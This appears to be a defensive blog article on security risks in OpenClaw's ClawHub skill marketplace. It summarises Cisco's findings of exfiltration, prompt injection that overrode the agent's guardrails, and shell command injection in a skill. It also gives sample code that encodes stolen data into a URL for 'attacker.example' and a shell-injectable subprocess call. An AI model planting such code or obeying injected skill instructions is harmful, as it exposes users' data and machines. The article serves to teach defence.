OpenClaw Skills: How ClawHub Works, Why Some Skills Are Dangerous, and How to Spot Them

ClawHub is OpenClaw's skill marketplace, and it's powerful. But Cisco's security team found 9 vulnerabilities in a single skill, including data exfiltration and command injection. Here's how skills work and how to tell safe ones from dangerous ones.

6 min read


One of OpenClaw's most powerful features is also one of its riskiest: skills.

Skills are small extensions that give OpenClaw new abilities. Want it to control Spotify? There's a skill. Want it to interact with GitHub? Skill. Want it to manage Obsidian notes? Skill. The marketplace where you find them is called ClawHub, and it has 50+ pre-built integrations.

OpenClaw can even search ClawHub and install new skills on its own, with no manual step required. That's incredibly convenient. It's also how malicious code gets onto your machine without you noticing. For a concrete case, see the live example of malicious ClawHub skills in the wild.

Cisco's AI Threat Research team tested this exact scenario. They found 9 security issues in a single skill. Here's what's going on, how the attacks work, and what you can actually do about it.


How Skills Work (The Basics)

A skill is a package of code plus metadata that extends what OpenClaw can do. When you install one, it gets access to OpenClaw's local gateway, which means it can:

  • Execute commands on your machine
  • Read and write files
  • Make network requests
  • Interact with other services and APIs

That's the same level of access OpenClaw itself has. A skill doesn't run in a sandbox. It runs with the same permissions as the agent.

This is why skills are powerful: they can do real things. And it's why a bad skill is genuinely dangerous.
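To make those bullet points concrete, here's a minimal sketch of the kind of access a skill's code has once installed. This is hypothetical illustration code, not taken from any real ClawHub skill, and the function names are invented:

```python
# Illustrative only: the categories of access a skill inherits from the
# agent. Nothing here is sandboxed; it all runs as the agent's user.
import subprocess
import urllib.request


def run_command(cmd: list[str]) -> str:
    # Skills can execute commands with the agent's own permissions.
    return subprocess.run(cmd, capture_output=True, text=True).stdout


def read_file(path: str) -> str:
    # ...and read (or write) any file the agent's user can access.
    with open(path) as f:
        return f.read()


def fetch(url: str) -> bytes:
    # ...and make arbitrary network requests.
    with urllib.request.urlopen(url) as resp:
        return resp.read()
```

None of these calls require any special capability grant: if the agent can do it, the skill can do it.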


What Cisco Found

Cisco's AI Threat Research team picked a skill called "What Would Elon Do?", a real skill from the ClawHub ecosystem, and tested it for security issues. They found nine.

Here's what the attack surface looked like:

Silent Data Exfiltration

The skill was sending information to an external server without any indication to the user. No log. No notification. Just quietly uploading data in the background while appearing to do something else entirely.
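To see how this stays invisible, here's a hedged sketch of the pattern. The domain and parameter names are made up for illustration; this builds the kind of request an exfiltrating skill might make, without sending anything:

```python
import base64
from urllib.parse import urlencode


def build_exfil_url(stolen: str) -> str:
    # The stolen data rides along as an innocuous-looking query parameter.
    token = base64.urlsafe_b64encode(stolen.encode()).decode()
    # "attacker.example" is a placeholder; real malicious code would
    # bury the destination behind string concatenation or config values
    # to avoid casual review.
    return "https://attacker.example/pixel?" + urlencode({"v": token})
```

To a quick glance at network logs, this looks like an analytics ping, which is exactly why "read the traffic" alone isn't enough.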

Direct Prompt Injection

The skill contained instructions that bypassed OpenClaw's own safety guidelines. It didn't need to trick the AI; it directly told it to do things the agent's normal guardrails would have blocked.

Bash Command Injection

The skill could execute arbitrary shell commands on the user's machine. Not commands the user asked for, but commands embedded in the skill itself.
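The underlying bug pattern is worth seeing in miniature. This sketch (Python for readability; the same applies in any language that shells out) contrasts an injectable call with a safe one. All names are illustrative:

```python
import subprocess


def vulnerable(filename: str) -> str:
    # BAD: input is spliced into a shell string, so metacharacters
    # like ';' let an attacker append extra commands.
    return subprocess.run(
        "echo " + filename, shell=True, capture_output=True, text=True
    ).stdout


def safe(filename: str) -> str:
    # Better: pass arguments as a list; the input is never parsed
    # by a shell, so metacharacters stay literal.
    return subprocess.run(
        ["echo", filename], capture_output=True, text=True
    ).stdout
```

With an input like `file.txt; echo INJECTED`, the first version runs two commands; the second treats the whole string as a single argument.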

Leaked API Keys and Credentials

Through a combination of prompt injection and unsecured endpoints, the skill was able to extract and expose plaintext API keys that the user had stored locally.
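Part of why locally stored keys are so exposed: any code running with the agent's permissions can simply read them. A minimal sketch, assuming secrets live in a plain `.env`-style file (the file format and key name here are illustrative assumptions):

```python
def read_dotenv(path: str) -> dict[str, str]:
    # Plaintext secrets on disk are readable by any skill, because
    # skills run with the agent's (i.e. the user's) file permissions.
    secrets = {}
    with open(path) as f:
        for line in f:
            line = line.strip()
            if line and not line.startswith("#") and "=" in line:
                key, _, value = line.partition("=")
                secrets[key.strip()] = value.strip()
    return secrets
```

The defense is the usual one: keep credentials in an OS keychain or secrets manager rather than plaintext files the agent can trivially read.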

Messaging Platform Exploitation

Because OpenClaw connects to WhatsApp, iMessage, and other chat apps, threat actors can craft malicious prompts through those platforms to trigger unintended behavior in skills.


Why This Is Harder to Catch Than It Sounds

On a normal app store, a human reviews each submission. On ClawHub, the ecosystem is moving too fast for that kind of manual review at scale. Skills get added, updated, and installed, sometimes automatically by OpenClaw itself.

Cisco identified four specific enterprise risks:

  1. AI agents bypass traditional data loss prevention (DLP) tools. DLP monitors network traffic and file access. An AI agent with skill-level access doesn't trigger the same alerts.
  2. The model becomes an execution orchestrator. It's not just processing text; it's running code, executing commands, making API calls. Traditional security tools aren't built to monitor that.
  3. Popularity can be artificially inflated. Bad actors can game skill rankings to make malicious skills look trustworthy and widely used.
  4. Employees install these tools without IT knowing. OpenClaw is easy to set up. Someone on your team might have it running on their laptop with skills installed that your security team has never seen.

How to Tell a Safe Skill From a Dangerous One

You can't just trust the download count or the rating. Here's what to actually look for:

Check the Source

Where did the skill come from? A known developer? An organization with a track record? Or an anonymous account with one skill and no history? Treat unknown sources the way you'd treat an unknown email attachment.

Read the Code

Skills are code. You can read them. Before installing anything, look at what it actually does. If it's making network requests to external servers you don't recognize, that's a red flag. If it's running shell commands that aren't related to its stated purpose, walk away.
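A few lines of code can surface the obvious red flags before you read further. This is a crude illustrative scan, not a substitute for actually reading the skill, and the patterns below are examples rather than a complete list:

```python
import re

# Things worth a second look in a skill's source. Matching one of these
# doesn't make a skill malicious; it tells you where to read carefully.
RED_FLAGS = {
    "network request": re.compile(r"https?://|urlopen|requests\.(get|post)"),
    "shell execution": re.compile(r"subprocess|os\.system|shell\s*=\s*True"),
    "dynamic code": re.compile(r"\beval\(|\bexec\("),
}


def scan_source(source: str) -> list[str]:
    # Return the names of every red-flag category the source triggers.
    return [name for name, pattern in RED_FLAGS.items()
            if pattern.search(source)]
```

The key question for each hit is the one from the article: is this call related to the skill's stated purpose, or not?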

Look for Unnecessary Permissions

A skill that helps you manage Spotify shouldn't need access to your file system or shell. If a skill is requesting permissions it doesn't need for its stated function, that's suspicious.
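One way to make this check mechanical is to diff a skill's declared permissions against what its stated purpose should require. A toy sketch; the skill name and permission labels are hypothetical, and real ClawHub manifests may look different:

```python
# Hypothetical baseline: what each kind of skill plausibly needs.
EXPECTED: dict[str, set[str]] = {
    "spotify-controller": {"network"},
    "note-manager": {"filesystem"},
}


def excess_permissions(skill: str, declared: set[str]) -> set[str]:
    # Anything declared beyond the expected set deserves scrutiny.
    return declared - EXPECTED.get(skill, set())
```

A Spotify skill declaring `filesystem` and `shell` on top of `network` is exactly the mismatch this section warns about.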

Check for Known Issues

Search for the skill name + "security" or "vulnerability." If Cisco or another security team has flagged it, you'll find it quickly.

Use Cisco's Skill Scanner

Cisco released an open-source tool called Skill Scanner specifically for this problem. It combines three types of analysis:

  • Static analysis: reads the skill's code before it runs
  • Behavioral inspection: watches what the skill does when it executes
  • Semantic analysis: evaluates whether the skill's actions match its stated purpose

If you're running OpenClaw and installing skills from ClawHub, Skill Scanner is worth adding to your workflow. It's the closest thing to an independent security check that exists right now.


The Bigger Picture: Supply Chain Risk for AI Agents

The ClawHub situation is a preview of a problem that's going to get bigger. As AI agents become more capable and more widespread, the "skills" or "tools" or "plugins" they use become a major attack surface, the same way app stores and npm packages are attack surfaces today.

The Moltbot rename incident is an earlier example of the same pattern: when OpenClaw was briefly called Moltbot, bad actors created fake "Moltbot" downloads designed to look like the real thing. People installed them. That's a supply chain attack, and skills are an even more direct version of the same vector, because they run inside the agent with full permissions.

The tools to defend against this are still early. Cisco's Skill Scanner is a good start. But the core problem of trusting code that runs with elevated permissions on your machine is a fundamentally old problem with a new shape.


What to Do Right Now

  1. Don't let OpenClaw auto-install skills without reviewing them first. You can configure this in the agent settings.
  2. Audit what's already installed. If you've been using OpenClaw for a while, check what skills are running. Read their code if you can.
  3. Use Skill Scanner before installing anything new from ClawHub.
  4. Set network monitoring on your machine. If a skill is silently exfiltrating data, network-level monitoring will catch it even if the skill itself doesn't log anything.
  5. Keep OpenClaw updated. Security patches for the agent itself matter โ€” but so do updates to the skills you're running.

Want the full picture on OpenClaw before diving into skills? Start with What Is OpenClaw? The Open-Source AI Agent Everyone Is Talking About. For the broader security landscape, read OpenClaw Security: What You Actually Need to Know.
